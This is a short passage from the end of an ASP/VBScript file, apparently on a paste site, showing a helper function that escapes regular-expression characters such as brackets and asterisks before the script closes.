  3811. str=Replace(str,")","\)")
  3812. str=Replace(str,"*","\*")
  3813. str=Replace(str,"[","\[")
  3814. str=Replace(str,"]","\]")
  3815. pxnsn=str
  3816. End Function
  3817. %>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement